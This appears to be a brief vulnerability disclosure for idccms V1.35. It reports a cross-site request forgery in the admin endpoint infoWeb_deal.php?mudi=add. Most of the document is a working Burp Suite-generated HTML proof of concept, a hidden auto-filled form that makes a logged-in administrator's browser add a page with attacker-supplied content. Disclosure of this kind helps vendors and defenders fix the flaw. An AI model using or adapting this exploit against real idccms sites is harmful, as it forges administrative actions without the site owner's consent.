target:http://idccms.com/ version: V1.35
idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component http://127.0.0.1:80/admin/infoWeb_deal.php?mudi=add
POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1:80/admin/infoWeb_deal.php?mudi=add" method="POST">
<input type="hidden" name="backURL" value="http%3A%2F%2F127.0.0.1%2Fadmin%2FinfoWeb.php%3Fmudi%3DdynWeb%26dataMode%3D%26dataModeStr%3D%26dataType%3DnewsWeb%26dataTypeCN%3D%25E5%258D%2595%25E7%25AF%2587%25E9%25A1%25B5%26dataType2%3D%26dataID%3D0%26menuID%3D397" />
<input type="hidden" name="dataType" value="newsWeb" />
<input type="hidden" name="dataTypeCN" value="%E5%8D%95%E7%AF%87%E9%A1%B5" />
<input type="hidden" name="dataMode" value="" />
<input type="hidden" name="dataModeStr" value="" />
<input type="hidden" name="isOne" value="0" />
<input type="hidden" name="dataID" value="0" />
<input type="hidden" name="theme" value="cs" />
<input type="hidden" name="webKey" value="" />
<input type="hidden" name="webDesc" value="" />
<input type="hidden" name="content" value="%3Cdiv+id%3D%22translatorExtensionContainer%22+class%3D%22translatorExtension%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cdiv+class%3D%22translatorExtension%22+style%3D%22position%3Afixed%3Bdisplay%3Aflex%3Bjustify-content%3Acenter%3Bbottom%3A-40vh%3Bleft%3A0px%3Bright%3A0px%3Bmargin%3A0px+auto%3Bwidth%3A100%25%3Btransition%3A80ms%3Bvisibility%3Ahidden%3B%22%3E%0D%0A%3C%2Fdiv%3E" />
<input type="hidden" name="upImgStr" value="" />
<input type="hidden" name="rank" value="10" />
<input type="hidden" name="state" value="1" />
<input type="hidden" name="wapState" value="1" />
<input type="hidden" name="x" value="68" />
<input type="hidden" name="y" value="20" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>